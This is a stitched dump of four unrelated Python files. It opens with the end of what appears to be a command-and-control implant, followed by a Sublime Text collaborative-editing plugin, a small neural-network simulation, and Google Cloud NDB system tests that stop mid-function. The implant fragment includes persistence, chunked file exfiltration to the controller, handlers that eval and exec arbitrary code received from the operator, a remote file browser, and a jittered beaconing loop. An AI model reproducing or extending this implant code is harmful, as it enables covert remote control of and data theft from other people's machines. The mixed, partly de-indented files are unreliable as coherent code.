'completed': False
}
responses.append(response)
print("\t- Persistance Done")
return
def download(task_id, path):
global responses
path = path.replace("\\", "/")
# print("Downloading " + path)
# chunkSize = 512000
chunkSize = 10000
fileSize = os.path.getsize(path)
chunks = math.ceil(fileSize / chunkSize)
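# e.g. a 25,000-byte file with chunkSize = 10000 needs ceil(25000 / 10000) = 3 chunks.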
fullpath = os.path.abspath(path)
# print("FILESIZE = " + str(fileSize))
# print(str(chunks) + " chunks needed")
response = {
"total_chunks": chunks,
"task_id": task_id,
"full_path": fullpath,
"host": "",
"is_screenshot": "false"
}
responses.append(response)
def download_thread():
i = 1
file_id = ""
while i != chunks +1:
if result:
for item in result['responses']:
if item['task_id'] == task_id and item['status'] == "success":
# print("HO TROVATO IL LA RIPOSTA SUCCESS PER QUESTO TASK")
if file_id == "":
file_id = item['file_id']
result['responses'].remove(item)
f = open(fullpath, 'r')
f.seek((i-1)*chunkSize)
blob = f.read(chunkSize)
chunk_data = to64(blob)
if i == chunks:
print("i == chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id,
"completed": True
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i +=1
print("\t- Download Done")
exit()
else:
print("i != chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i += 1
if item['task_id'] == task_id and item['status'] != "success":
print("ERROR SENDING FILE")
break
d = threading.Thread(target=download_thread, args=())
d.start()
def run(task_id, code):
global responses
print("\t" + code)
eval(code)
response = {
'task_id': task_id,
"user_output": "Executed",
'completed': True
}
responses.append(response)
print("\t- Run Done")
return
def code(task_id, code, param, parallel_id):
global responses
global worker_output  # the loaded code is expected to set this module-level name
print("Running code with \n {} \n {}".format(code, param))
try:
exec(code)
eval("worker(param)")
except Exception as e:
print(e)
response = {
'task_id': task_id,
"user_output": worker_output,
'completed': True
}
responses.append(response)
print("\t- Parallel Done")
return
def ls(task_id, path, third):
global responses
path = path.replace("\\", "")
path = path.replace("//", "/")
fullpath = str(os.path.abspath(path))
files = []
for f in os.listdir(path):
permissions = ""
modify_time = ""
access_time = ""
file_path = os.path.join(fullpath, f)  # resolve against the listed directory, not the CWD
try:
st = os.stat(file_path)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(file_path)
access_time = time.ctime (fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(file_path))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(file_path):
    try:
        # Walk the entry itself; do not clobber the outer `path`/`files` names.
        for root, dirs, walk_files in os.walk(file_path):
            for x in walk_files:
                fp = os.path.join(root, x)
                size += os.path.getsize(fp)
    except:
        size = -1
elif os.path.isfile(file_path):
    try:
        size = os.path.getsize(file_path)
    except:
        size = -1
try:
a = {
"is_file": os.path.isfile(f),
"permissions": {'permissions': permissions},
"name": f,
"access_time": access_time,
"modify_time": modify_time,
"size": size
}
files.append(a)
except:
print("No permission")
name = ""
if os.path.isfile(path):
name = path
else:
name = os.path.basename(os.path.normpath(fullpath))
permissions = ""
modify_time = ""
access_time = ""
try:
st = os.stat(fullpath)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(fullpath)
access_time = time.ctime(fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(fullpath))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(fullpath):
    try:
        for root, dirs, walk_files in os.walk(fullpath):
            for x in walk_files:
                fp = os.path.join(root, x)
                size += os.path.getsize(fp)
    except:
        size = -1
elif os.path.isfile(fullpath):
    try:
        size = os.path.getsize(fullpath)
    except:
        size = -1
parent_path = os.path.dirname(fullpath)
if name == "":
name = "/"
parent_path = ""
response = {
"task_id": task_id,
"user_output": "Listing Done",
"file_browser": {
"host": socket.gethostname(),
"is_file": os.path.isfile(fullpath),
"permissions": {'permissions': permissions},
"name": name,
"parent_path": parent_path,
"success": True,
"access_time": access_time,
"modify_time": modify_time,
"size": size,
"files": files,
},
"completed": True
}
responses.append(response)
print("\t- ls Done")
return
def parallel(task_id, file_name, workers, parameters={}):
response = {
'task_id': task_id,
"user_output": "Command received",
'completed': True
}
responses.append(response)
return
################################################################################################################
# MAIN LOOP
# agent = Agent()
uuid_file = "UUID.txt"
if os.path.isfile(uuid_file):
# f = open(uuid_file, "r")
# agent.UUID = f.read()
pass
else:
checkin()
# f = open(uuid_file, "w")
# f.write(agent.UUID)
# f.close()
# ip = getPublicIP()
# if ip == "194.195.242.157" or ip == "172.104.135.23" or ip == "172.104.135.67":
# print("[+] P2P Server")
# p2p_server(1)
while True:
while not redirecting:
tasks = get_tasks()
execute_tasks(tasks)
# Random sign for the jitter offset (see execute_tasks).
r = random.choice((-1, 1))
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
sleep_time = random.randint(0, int(sleep_time))
time.sleep(sleep_time / 5)
|
tandem.py | import os
import sys
import random
from subprocess import Popen, PIPE
from threading import Thread, Event
import sublime
import sublime_plugin
from tandem.diff_match_patch import diff_match_patch
from tandem.edit import Edit
# sys hack to add enum, required by the messages module file
sys.path.append(os.path.join(os.path.dirname(__file__), "enum-dist"))
import tandem.agent.tandem.agent.protocol.messages.editor as m # noqa
DEBUG = False
is_active = False
is_processing = False
patch = diff_match_patch()
def spawn_agent(extra_args=None):
if extra_args is None:
extra_args = []
dirname = os.path.dirname(__file__)
filename = str(os.path.join(dirname, "agent/main.py"))
return Popen(
["python3", filename] + extra_args,
stdin=PIPE,
stdout=PIPE,
)
def get_string_port():
starting_port = random.randint(60600, 62600)
return str(starting_port)
def index_to_point(buffer_line_lengths, index):
index_left = index
for i in range(len(buffer_line_lengths)):
if index_left >= buffer_line_lengths[i] + 1:
index_left -= buffer_line_lengths[i] + 1
else:
return (i, index_left)
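# Example: with line lengths [3, 5] (i.e. "abc\nhello"), index 4 maps to
# (1, 0): 4 consumes "abc" plus its newline (3 + 1) before landing on row 1.
# Indices past the end of the buffer fall through and return None.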
def error():
print("An error occurred.")
def show_message(msg, show_gui):
if show_gui:
sublime.message_dialog(msg)
else:
print(msg)
class TandemCommand(sublime_plugin.TextCommand):
def run(self, edit, host_ip=None, host_port=None, show_gui=False):
global tandem_agent
tandem_agent.start(self.view, show_gui=show_gui)
def is_enabled(self):
global is_active
return not is_active
class TandemConnectCommand(sublime_plugin.TextCommand):
def _start(self, args):
global tandem_agent
tandem_agent.start(self.view, session_id=args, show_gui=True)
def run(self, edit):
global is_active
if is_active:
msg = "Cannot start. An instance is already running on :{}".format(
tandem_agent.agent_port,
)
show_message(msg, True)
return
sublime.active_window().show_input_panel(
caption="Enter Session ID",
initial_text="",
on_done=self._start,
on_change=None,
on_cancel=None,
)
def is_enabled(self):
global is_active
return not is_active
class TandemStopCommand(sublime_plugin.TextCommand):
def run(self, edit, show_gui=False):
global tandem_agent
tandem_agent.stop(show_gui)
def is_enabled(self):
global is_active
return is_active
class TandemSessionCommand(sublime_plugin.TextCommand):
def run(self, edit, show_gui=False):
global tandem_agent
tandem_agent.show_session_id(show_gui)
def is_enabled(self):
global is_active
return is_active
class TandemPlugin:
@property
def agent_port(self):
return self._agent_port
@property
def _current_buffer(self):
return self._view.substr(sublime.Region(0, self._view.size()))
def _initialize(self, view):
self._view = view
self._buffer = ""
self._output_checker = Thread(target=self._check_message)
self._text_applied = Event()
self._session_id = None
def _start_agent(self):
self._agent_port = get_string_port()
self._agent = spawn_agent([
"--port",
self._agent_port,
"--log-file",
"/tmp/tandem-agent-{}.log".format(self._agent_port),
])
if self._connect_to is not None:
message = m.JoinSession(self._connect_to)
else:
message = m.HostSession()
self._agent.stdin.write(m.serialize(message).encode("utf-8"))
self._agent.stdin.write("\n".encode("utf-8"))
self._agent.stdin.flush()
self._agent_stdout_iter = iter(self._agent.stdout.readline, b"")
self._output_checker.start()
def _shut_down_agent(self):
self._agent.stdin.close()
self._agent.terminate()
self._agent.wait()
def check_buffer(self, buffer_id):
if self._view.buffer_id() != buffer_id:
return
current_buffer = self._current_buffer
if len(current_buffer) != len(self._buffer):
self._send_patches(current_buffer)
else:
for i in range(len(current_buffer)):
if current_buffer[i] != self._buffer[i]:
self._send_patches(current_buffer)
break
self._buffer = current_buffer
def _create_patch(self, start, end, text):
if start is None or end is None or text is None:
# Raise an error if in debug mode, otherwise return None
if DEBUG:
raise ValueError
else:
return None
return [
{
"start": {
"row": start[0],
"column": start[1],
},
"end": {
"row": end[0],
"column": end[1],
},
"text": "",
},
{
"start": {
"row": start[0],
"column": start[1],
},
"end": {
"row": 0,
"column": 0,
},
"text": text,
}
]
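# Each change is encoded as a pair: a deletion covering [start, end),
# followed by an insertion of the replacement text at start; the agent is
# expected to apply them in order.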
def _send_patches(self, current_buffer):
try:
prev_contents = self._buffer
curr_contents = current_buffer
diff_patches = patch.patch_make(prev_contents, curr_contents)
patches = []
length_buffer = [len(x) for x in prev_contents.split(os.linesep)]
for p in diff_patches:
start_index = p.start1
end_index = p.start1 + p.length1
start_index_offset = 0
end_index_offset = 0
while(len(p.diffs)):
(op, data) = p.diffs[0]
if (op != diff_match_patch.DIFF_EQUAL):
break
start_index_offset = start_index_offset + len(data)
p.diffs.pop(0)
while(len(p.diffs)):
(op, data) = p.diffs[-1]
if (op != diff_match_patch.DIFF_EQUAL):
break
end_index_offset = end_index_offset + len(data)
p.diffs.pop()
start_rc = index_to_point(
length_buffer,
start_index + start_index_offset,
)
end_rc = index_to_point(
length_buffer,
end_index - end_index_offset,
)
text = []
for (op, data) in p.diffs:
if op == diff_match_patch.DIFF_INSERT or \
op == diff_match_patch.DIFF_EQUAL:
text.append(data)
text = "".join(text)
text_lengths = [len(word) for word in text.split(os.linesep)]
if start_rc[0] == end_rc[0]:
length_buffer[start_rc[0]] += text_lengths[0]
length_buffer[start_rc[0]] -= end_rc[1] - start_rc[1]
length_buffer[start_rc[0] + 1: start_rc[0] + 1] = \
text_lengths[1:]
else:
if len(text_lengths) > 1:
length_buffer[start_rc[0]] = \
start_rc[1] + text_lengths[0]
length_buffer[end_rc[0]] = length_buffer[end_rc[0]] \
- end_rc[1] + text_lengths[-1]
length_buffer[start_rc[0] + 1: end_rc[0]] = \
text_lengths[1:-1]
else:
length_buffer[start_rc[0]] = \
start_rc[1] + text_lengths[0] \
+ length_buffer[end_rc[0]] - end_rc[1]
length_buffer[start_rc[0] + 1: end_rc[0] + 1] = []
patches.extend(
self._create_patch(start_rc, end_rc, text)
)
patches = [p for p in patches if p is not None]
if len(patches) > 0:
message = m.NewPatches(patches)
self._agent.stdin.write(m.serialize(message).encode("utf-8"))
self._agent.stdin.write("\n".encode("utf-8"))
self._agent.stdin.flush()
except:
error()
if DEBUG:
raise
def _read_message(self):
try:
binary_line = next(self._agent_stdout_iter)
line = binary_line.decode("utf-8")
return m.deserialize(line)
except StopIteration:
return None
def _check_message(self):
while True:
self._text_applied.clear()
message = self._read_message()
if message is None:
break
def callback():
self._handle_message(message)
sublime.set_timeout(callback, 0)
self._text_applied.wait()
def _handle_write_request(self, message):
# Flush out any non-diff'd changes first
self.check_buffer(self._view.buffer_id())
# Allow agent to apply remote operations
ack = m.WriteRequestAck(message.seq)
self._agent.stdin.write(m.serialize(ack).encode("utf-8"))
self._agent.stdin.write("\n".encode("utf-8"))
self._agent.stdin.flush()
try:
# Read, expect, and process an ApplyPatches message
message = self._read_message()
if not isinstance(message, m.ApplyPatches):
raise ValueError("Invalid message. Expected ApplyPatches.")
self._handle_apply_patches(message)
except ValueError as v:
raise v
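    # Write handshake, as implemented above: the agent sends a WriteRequest,
    # the plugin flushes pending local edits and replies with a
    # WriteRequestAck, then the agent follows up with an ApplyPatches message
    # that is applied to the view.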
def _handle_apply_patches(self, message):
for patch in message.patch_list:
start = patch["oldStart"]
end = patch["oldEnd"]
text = patch["newText"]
start_point = self._view.text_point(
start["row"],
start["column"],
)
end_point = self._view.text_point(
end["row"],
end["column"],
)
"""
Edit cannot be passed around
https://forum.sublimetext.com/t/multithreaded-plugin/14439
Use view abstraction instead.
"""
with Edit(self._view) as edit:
edit.replace(
sublime.Region(start_point, end_point),
text,
)
self._buffer = self._current_buffer
def _handle_message(self, message):
global is_processing
is_processing = True
try:
if isinstance(message, m.WriteRequest):
self._handle_write_request(message)
elif isinstance(message, m.ApplyPatches):
raise ValueError("Invalid message. ApplyPatches must be "
"preceeded by a WriteRequest.")
elif isinstance(message, m.SessionInfo):
self._session_id = message.session_id
show_message("Session ID: {}".format(message.session_id), True)
else:
raise ValueError("Unsupported message.")
except ValueError as v:
raise v
finally:
is_processing = False
self._text_applied.set()
def start(self, view, session_id=None, show_gui=False):
global is_active
if is_active:
msg = "Cannot start. An instance is already running on :{}".format(
self._agent_port,
)
show_message(msg, show_gui)
return
self._connect_to = session_id
if self._connect_to is not None:
view = sublime.active_window().new_file()
self._initialize(view)
self._start_agent()
is_active = True
if self._connect_to is None:
self.check_buffer(view.buffer_id())
def stop(self, show_gui):
global is_active
if not is_active:
msg = "No Tandem instance running."
show_message(msg, show_gui)
return
is_active = False
self._shut_down_agent()
        if self._output_checker.is_alive():
self._output_checker.join()
msg = "Tandem instance shut down."
show_message(msg, show_gui)
def show_session_id(self, show_gui):
global is_active
if not is_active:
msg = "No Tandem instance running."
show_message(msg, show_gui)
return
if self._session_id is not None:
message = "Session ID: {}".format(self._session_id)
else:
message = "Error: No Session ID assigned."
show_message(message, show_gui)
class TandemTextChangedListener(sublime_plugin.EventListener):
def on_modified(self, view):
global is_active
global is_processing
if not is_active or is_processing:
return
global tandem_agent
tandem_agent.check_buffer(view.buffer_id())
tandem_agent = TandemPlugin()
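# A minimal sketch of how Sublime commands could drive the plugin instance
# above. The command class names are hypothetical and not part of this file.
class TandemStartCommand(sublime_plugin.TextCommand):
    def run(self, edit):
        tandem_agent.start(self.view, show_gui=True)
class TandemStopCommand(sublime_plugin.TextCommand):
    def run(self, edit):
        tandem_agent.stop(show_gui=True)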
|
plexus.py | import random
import math
import threading
import time
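# Sleep for the given number of microseconds; _ignite uses this to idle
# cheaply while the network is frozen.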
usleep = lambda x: time.sleep(x/1000000.0)
class Neuron():
def __init__(self, network):
self.network = network
self.subscriptions = {}
self.publications = {}
self.potential = random.uniform(0.0, 1.0)
self.desired_potential = None
self.loss = None
self.type = 0
self.network.neurons.append(self)
self.fire_counter = 0
self.ban_counter = 0
self.position = (None, None)
self.index = None
def partially_subscribe(self):
if len(self.subscriptions) == 0:
sample_length = int(random.normalvariate(
self.network.connectivity,
self.network.connectivity_sqrt
))
if sample_length > len(self.network.nonmotor_neurons):
sample_length = len(self.network.nonmotor_neurons)
if sample_length <= 0:
sample_length = 0
elected = random.sample(
self.network.nonmotor_neurons,
sample_length
)
for neuron in elected:
if id(neuron) != id(self):
self.subscriptions[neuron] = random.uniform(-1.0, 1.0)
neuron.publications[self] = 0
self.network.initiated_neurons += 1
def calculate_potential(self):
total = 0
for neuron, weight in self.subscriptions.items():
total += neuron.potential * weight
return self.activation_function(total)
def activation_function(self, x):
return 1 / (1 + math.exp(-x))
def derivative(self, x):
return x * (1-x)
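    # Note: derivative() expects the sigmoid's output, not its input; for
    # y = activation_function(x), dy/dx = y * (1 - y), which is why fire()
    # passes neuron.potential to it below.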
def calculate_loss(self):
return self.potential - self.desired_potential
def fire(self):
if self.type != 1:
self.potential = self.calculate_potential()
self.network.fire_counter += 1
self.fire_counter += 1
if self.desired_potential is not None:
self.loss = self.calculate_loss()
if self.loss > 0:
alteration_sign = -1
elif self.loss < 0:
alteration_sign = 1
else:
self.desired_potential = None
return True
alteration_value = (abs(self.loss) ** 2)
alteration_value *= (
self.network.decay_factor
** (self.network.fire_counter/1000)
)
for neuron, weight in self.subscriptions.items():
                neuron.desired_potential = neuron.potential + (
                    alteration_sign * self.derivative(neuron.potential)
                )
                self.subscriptions[neuron] = weight + (
                    alteration_value * alteration_sign
                ) * self.derivative(neuron.potential)
class Network():
def __init__(
self,
size,
input_dim=0,
output_dim=0,
connectivity=0.01,
precision=2,
randomly_fire=False,
dynamic_output=False,
visualization=False,
decay_factor=1.0
):
self.precision = precision
print("\nPrecision of the network will be {0}".format(
str(1.0 / (10**precision))
))
self.connectivity = int(size * connectivity)
self.connectivity_sqrt = int(math.sqrt(self.connectivity))
print("Each individual non-sensory neuron will subscribe to {0} \
different neurons".format(
str(int(size * connectivity))
))
self.neurons = []
for i in range(size):
Neuron(self)
print("\n")
print(str(size) + " neurons created")
self.sensory_neurons = []
self.input_dim = input_dim
self.pick_sensory_neurons(self.input_dim)
self.motor_neurons = []
self.output_dim = output_dim
self.pick_motor_neurons(self.output_dim)
self.nonsensory_neurons = [x for x in self.neurons if x.type != 1]
self.nonmotor_neurons = [x for x in self.neurons if x.type != 2]
self.interneurons = [x for x in self.neurons if x.type == 0]
self.randomly_fire = randomly_fire
self.motor_randomly_fire_rate = int(math.sqrt(
len(self.nonsensory_neurons) / len(self.motor_neurons)
))
self.dynamic_output = dynamic_output
self.decay_factor = decay_factor
self.initiated_neurons = 0
self.initiate_subscriptions()
self.fire_counter = 0
self.first_queue = {}
self.next_queue = {}
self.output = []
self.wave_counter = 0
print("\n")
self.freezer = False
self.stop = False
self.thread1 = None
self.thread2 = None
self.thread_kill_signal = False
if visualization:
self.visualize()
self.ignite()
print("")
def initiate_subscriptions(self):
print("")
for neuron in self.neurons:
if neuron.type == 1:
continue
neuron.partially_subscribe()
print("Initiated: {0} neurons\r".format(
str(self.initiated_neurons)
), sep=' ', end='', flush=True)
print("\n")
def add_neurons(self, units):
for i in range(units):
Neuron(self)
print("\n")
print(str(units) + " neurons added")
self.initiate_subscriptions()
def _ignite(self):
motor_fire_counter = 0
ban_list = []
while True:
if self.stop:
break
if self.freezer:
usleep(10)
continue
if self.randomly_fire:
neuron = random.sample(self.nonsensory_neurons, 1)[0]
if neuron.type == 2:
if 1 != random.randint(1, self.motor_randomly_fire_rate):
continue
else:
motor_fire_counter += 1
neuron.fire()
if motor_fire_counter >= len(self.motor_neurons):
if self.dynamic_output:
print("Output: {0}\r".format(
str(self.get_output())
), sep=' ', end='', flush=True)
self.output = self.get_output()
self.wave_counter += 1
motor_fire_counter = 0
else:
if not self.next_queue:
for neuron in self.motor_neurons:
neuron.fire()
for neuron in ban_list:
neuron.ban_counter = 0
ban_list = []
self.output = self.get_output()
self.wave_counter += 1
if self.dynamic_output:
print("Output: {0}\r".format(
str(self.output)
), sep=' ', end='', flush=True)
if not self.first_queue:
for neuron in self.sensory_neurons:
self.first_queue.update(neuron.publications)
self.next_queue = self.first_queue.copy()
current_queue = self.next_queue.copy()
self.next_queue = {}
for neuron in ban_list:
if neuron.ban_counter > self.connectivity_sqrt:
current_queue.pop(neuron, None)
while current_queue:
neuron = random.choice(list(current_queue.keys()))
current_queue.pop(neuron, None)
if neuron.ban_counter <= self.connectivity_sqrt:
if neuron.type == 2:
continue
neuron.fire()
ban_list.append(neuron)
neuron.ban_counter += 1
self.next_queue.update(neuron.publications)
time.sleep(0.001)
def ignite(self):
self.freezer = False
self.stop = False
if not self.thread1:
self.thread1 = threading.Thread(target=self._ignite)
self.thread1.start()
print("Network has been ignited")
def freeze(self):
self.freezer = True
self.stop = True
self.thread1 = None
self.thread2 = None
self.thread_kill_signal = True
print("Network is now frozen")
def breakit(self):
for neuron in self.neurons:
neuron.subscriptions = {}
print("All the subscriptions are now broken")
def pick_sensory_neurons(self, input_dim):
available_neurons = []
for neuron in self.neurons:
if neuron.type == 0:
available_neurons.append(neuron)
for neuron in random.sample(available_neurons, input_dim):
neuron.type = 1
self.sensory_neurons.append(neuron)
print(str(input_dim) + " neuron picked as sensory neuron")
def pick_motor_neurons(self, output_dim):
available_neurons = []
for neuron in self.neurons:
if neuron.type == 0:
available_neurons.append(neuron)
for neuron in random.sample(available_neurons, output_dim):
neuron.type = 2
self.motor_neurons.append(neuron)
print(str(output_dim) + " neuron picked as motor neuron")
def load(self, input_arr, output_arr=None):
if len(self.sensory_neurons) != len(input_arr):
print("Size of the input array: {0}".format(str(len(input_arr))))
print("Number of the sensory neurons: {0}".format(
str(len(self.sensory_neurons))
))
print("Size of the input array and number of the sensory \
neurons are not matching! Please try again")
else:
step = 0
for neuron in self.sensory_neurons:
neuron.potential = input_arr[step]
step += 1
if output_arr is None:
step = 0
self.freezer = True
for neuron in self.nonsensory_neurons:
neuron.desired_potential = None
step += 1
self.freezer = False
else:
if len(self.motor_neurons) != len(output_arr):
print("Size of the output/target array: {0}".format(
str(len(output_arr))
))
print("Number of the motor neurons: {0}".format(
str(len(self.motor_neurons))
))
print("Size of the output/target array and number of the\
motor neurons are not matching! Please try again")
else:
step = 0
for neuron in self.motor_neurons:
neuron.desired_potential = output_arr[step]
step += 1
def get_output(self):
output = []
for neuron in self.motor_neurons:
output.append(round(
neuron.potential,
self.precision
))
return output
def visualize(self):
self.thread2 = threading.Thread(target=self._visualize)
self.thread2.start()
print("Visualization initiated")
def _visualize(self):
import pyqtgraph as pg
import numpy as np
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
w = pg.GraphicsWindow()
w.setWindowTitle('Visualization of the Network')
v = w.addViewBox()
v.setAspectLocked()
g = pg.GraphItem()
v.addItem(g)
positions = []
symbols = []
symbol_brushes = []
        x = 1
        y = 0
for neuron in self.sensory_neurons:
y += 1
neuron.position = (x, y)
positions.append(neuron.position)
symbols.append('t')
symbol_brushes.append((250, 194, 5))
neuron.index = len(positions) - 1
x += len(self.sensory_neurons)
y = (len(self.sensory_neurons) - len(self.interneurons)) / 2
for neuron in self.interneurons:
y += 1
neuron.position = (
random.uniform(
x - len(self.sensory_neurons)/1.5,
x + len(self.sensory_neurons)/1.5
),
y
)
positions.append(neuron.position)
symbols.append('h')
symbol_brushes.append((195, 46, 212))
neuron.index = len(positions) - 1
x += len(self.sensory_neurons)
y = (len(self.sensory_neurons) - len(self.motor_neurons)) / 2
for neuron in self.motor_neurons:
y += 1
neuron.position = (x, y)
positions.append(neuron.position)
symbols.append('s')
symbol_brushes.append((19, 234, 201))
neuron.index = len(positions) - 1
while True:
connections = []
lines = []
for neuron2 in self.neurons:
for neuron1, weight in neuron2.subscriptions.items():
connections.append((neuron1.index, neuron2.index))
lines.append((55, 55, 55, ((weight+1)/2)*255, (weight+1)))
positions = np.asarray(positions)
connections = np.asarray(connections)
lines = np.asarray(lines, dtype=[
('red', np.ubyte),
('green', np.ubyte),
('blue', np.ubyte),
('alpha', np.ubyte),
('width', float)
])
g.setData(
pos=positions,
adj=connections,
pen=lines,
size=0.1,
symbolBrush=symbol_brushes,
symbol=symbols,
pxMode=False
) # Update the graph
pg.QtGui.QApplication.processEvents()
if self.thread_kill_signal:
break
time.sleep(0.0333)
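# Illustrative usage sketch: the sizes, input pattern, and target below are
# made-up values for demonstration and are not part of the original module.
if __name__ == "__main__":
    net = Network(size=64, input_dim=4, output_dim=2, connectivity=0.2)
    net.load([0.1, 0.9, 0.3, 0.5], [1.0, 0.0])  # sensory input + desired output
    time.sleep(2)  # let a few waves of firing and weight updates propagate
    print("Output after training:", net.get_output())
    net.freeze()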
|
test_crud.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import os
import pickle
import pytz
import random
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from . import KIND, eventually, equals
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
USE_MEMCACHE = bool(os.environ.get("MEMCACHED_HOSTS"))
def _assert_contemporaneous(timestamp1, timestamp2, delta_margin=2):
delta_margin = datetime.timedelta(seconds=delta_margin)
assert delta_margin > abs(timestamp1 - timestamp2)
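# For example, with the default two-second margin, timestamps 1.5 seconds
# apart pass and timestamps 3 seconds apart fail.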
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
cache_value = global_cache.get([cache_key])[0]
assert cache_value
assert not _cache.is_locked_value(cache_value)
patch = mock.patch(
"google.cloud.ndb._datastore_api._LookupBatch.add",
mock.Mock(side_effect=Exception("Shouldn't call this")),
)
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_retrieve_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
cache_value = redis_context.global_cache.redis.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
patch = mock.patch(
"google.cloud.ndb._datastore_api._LookupBatch.add",
mock.Mock(side_effect=Exception("Shouldn't call this")),
)
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_MEMCACHE, reason="Memcache is not configured")
def test_retrieve_entity_with_memcache(ds_entity, memcache_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
cache_key = global_cache_module.MemcacheCache._key(cache_key)
cache_value = memcache_context.global_cache.client.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
patch = mock.patch(
"google.cloud.ndb._datastore_api._LookupBatch.add",
mock.Mock(side_effect=Exception("Shouldn't call this")),
)
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
